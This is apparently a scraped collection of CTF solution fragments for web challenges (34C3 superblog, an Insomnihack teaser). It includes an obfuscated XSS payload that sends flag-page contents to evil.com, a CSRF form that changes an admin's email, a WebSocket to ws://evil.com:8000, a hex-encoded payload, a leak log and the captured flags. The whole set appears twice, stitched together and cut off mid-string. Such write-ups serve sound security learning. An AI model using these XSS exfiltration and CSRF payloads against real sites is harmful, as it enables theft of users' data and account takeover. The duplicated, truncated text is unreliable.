Pepe Vila cgvwzq

## source.js
const fs = require('fs');
const express = require('express');
const session = require('express-session')
const cookieParser = require('cookie-parser');
const { URL } = require('url');
const uuidv4 = require('uuid/v4');
const path = require('path');
const bot = require('./bot');
const crypto = require('crypto');
const mariadb = require('mariadb');

## js-lower-alpha-parent-dot.html
<style>
textarea {
	width: 100%;
	height: 30%;
}
</style>
<textarea id="input">alert('xss')</textarea>
<textarea id="output"></textarea>
<br>
<label>Length: </label><span id="numchars"></span>

## output.log
[+] Server is listening on 5001
...pre-payoad:
...post-payoad:
...pre-payoad: d
...post-payoad: 3
...pre-payoad: d3
...post-payoad: d3
...pre-payoad: d3a
...post-payoad: 0d3
...pre-payoad: d3ad

## index.html
<!doctype html>
<meta charset=utf-8>
<script>
(function(){
	let p = '66756e6374696f6e20776f6c6f6c6f2829207b0a2f2a2070616464696e6770616464696e6770616464696e6770616464696e202a2f0a6c65742078203d205b60a93b8c71cd270612671823b651adad9cdb3cd1d746c54f2911be40d107cc15e790e1a8be804d36484bcee114fe8f137bb71fb709c1a16d399884facf5936714b1fe4c9be4e2ec593c1df6e22d6ee0fc42198160b689c02f9a9c300c89b5f68c8d33530f89fc8721efb41cc3adc73008702d7c7373b70cbb75ae7575a6f7df566602c2f2a666a35374e4762304954714678656e6c6f374644766e41775a47464e346f6e4538535274443134766e3564776d79424b546d56496c6c4c706b4d2a2f6000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005752ca3581b494dd996d5ddeab432a3bfb53bbcdb05dd34401241f1cf273e3c9812ecd67c66f2fb8f046e3cc1f5787921df10fc8423f626c6bef6f09947df69992d2ba0431422fbcc26dcdd16e4b6cbf198c3a5b12fa72b066932264a9afdbc8da7ba363f8ea1c70267c50992d0c9dee41000116dc523f4e61c37e208a9cf34602c2f2a39697a366c534166596d46786a48446e375246446e353875544

## index.html
<body>
<form action="http://css.teaser.insomnihack.ch/?page=profile" method="POST">
    // change admin's email
    <input type="text" name="email" value="wololo@coolmail.com">
    <input type="text" name="csrf" value="">
    <input type="text" name="change" value="Modify profile">
</form>
<iframe id="leakchar"></iframe>
<script>
const WS = "ws://evil.com:8000";

## solution.html
XSS vector:
<link id=foo rel=import href=/flag(1|2)>
<script src="/feed?type=jsonp&cb=payload"></script>

<!-- superblog 1 - flag: 34C3_so_y0u_w3nt_4nd_learned_SOME_javascript_g00d_f0r_y0u -->
<script>
document.write`${Array.call`${atob`PA`}${`l`}${`i`}${`n`}${`k`}${atob`IA`}${`r`}${`e`}${`l`}${atob`PQ`}${atob`Ig`}${`p`}${`r`}${`e`}${`f`}${`e`}${`t`}${`c`}${`h`}${atob`Ig`}${atob`IA`}${`h`}${`r`}${`e`}${`f`}${atob`PQ`}${atob`Ig`}${`h`}${`t`}${`t`}${`p`}${atob`Og`}${atob`Lw`}${atob`Lw`}${`evil`}${atob`Lg`}${`com`}${atob`Og`}${atob`Lw`}${Math.random``}${`_`}${escape.call`${document.getElementsByTagName`link`.item``.import.body.innerText}`}${atob`Ig`}${atob`Pg`}`.join``}`,
</script>

<!-- superblog 2 - flag: 34C3_h3ncef0rth_peopl3_sh4ll_refer_t0_y0u_only_4s_th3_ES6+DOM_guru -->
	const fs = require('fs');
	const express = require('express');
	const session = require('express-session')
	const cookieParser = require('cookie-parser');
	const { URL } = require('url');
	const uuidv4 = require('uuid/v4');
	const path = require('path');
	const bot = require('./bot');
	const crypto = require('crypto');
	const mariadb = require('mariadb');
	<style>
	textarea {
	width: 100%;
	height: 30%;
	}
	</style>
	<textarea id="input">alert('xss')</textarea>
	<textarea id="output"></textarea>
	<br>
	<label>Length: </label><span id="numchars"></span>
	[+] Server is listening on 5001
	...pre-payoad:
	...post-payoad:
	...pre-payoad: d
	...post-payoad: 3
	...pre-payoad: d3
	...post-payoad: d3
	...pre-payoad: d3a
	...post-payoad: 0d3
	...pre-payoad: d3ad
	<!doctype html>
	<meta charset=utf-8>
	<script>
	(function(){
	let p = '66756e6374696f6e20776f6c6f6c6f2829207b0a2f2a2070616464696e6770616464696e6770616464696e6770616464696e202a2f0a6c65742078203d205b60a93b8c71cd270612671823b651adad9cdb3cd1d746c54f2911be40d107cc15e790e1a8be804d36484bcee114fe8f137bb71fb709c1a16d399884facf5936714b1fe4c9be4e2ec593c1df6e22d6ee0fc42198160b689c02f9a9c300c89b5f68c8d33530f89fc8721efb41cc3adc73008702d7c7373b70cbb75ae7575a6f7df566602c2f2a666a35374e4762304954714678656e6c6f374644766e41775a47464e346f6e4538535274443134766e3564776d79424b546d56496c6c4c706b4d2a2f6000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005752ca3581b494dd996d5ddeab432a3bfb53bbcdb05dd34401241f1cf273e3c9812ecd67c66f2fb8f046e3cc1f5787921df10fc8423f626c6bef6f09947df69992d2ba0431422fbcc26dcdd16e4b6cbf198c3a5b12fa72b066932264a9afdbc8da7ba363f8ea1c70267c50992d0c9dee41000116dc523f4e61c37e208a9cf34602c2f2a39697a366c534166596d46786a48446e375246446e353875544
	<body>
	<form action="http://css.teaser.insomnihack.ch/?page=profile" method="POST">
	// change admin's email
	<input type="text" name="email" value="wololo@coolmail.com">
	<input type="text" name="csrf" value="">
	<input type="text" name="change" value="Modify profile">
	</form>
	<iframe id="leakchar"></iframe>
	<script>
	const WS = "ws://evil.com:8000";
	XSS vector:
	<link id=foo rel=import href=/flag(1\|2)>
	<script src="/feed?type=jsonp&cb=payload"></script>

	<!-- superblog 1 - flag: 34C3_so_y0u_w3nt_4nd_learned_SOME_javascript_g00d_f0r_y0u -->
	<script>
	document.write`${Array.call`${atob`PA`}${`l`}${`i`}${`n`}${`k`}${atob`IA`}${`r`}${`e`}${`l`}${atob`PQ`}${atob`Ig`}${`p`}${`r`}${`e`}${`f`}${`e`}${`t`}${`c`}${`h`}${atob`Ig`}${atob`IA`}${`h`}${`r`}${`e`}${`f`}${atob`PQ`}${atob`Ig`}${`h`}${`t`}${`t`}${`p`}${atob`Og`}${atob`Lw`}${atob`Lw`}${`evil`}${atob`Lg`}${`com`}${atob`Og`}${atob`Lw`}${Math.random``}${`_`}${escape.call`${document.getElementsByTagName`link`.item``.import.body.innerText}`}${atob`Ig`}${atob`Pg`}`.join``}`,
	</script>

	<!-- superblog 2 - flag: 34C3_h3ncef0rth_peopl3_sh4ll_refer_t0_y0u_only_4s_th3_ES6+DOM_guru -->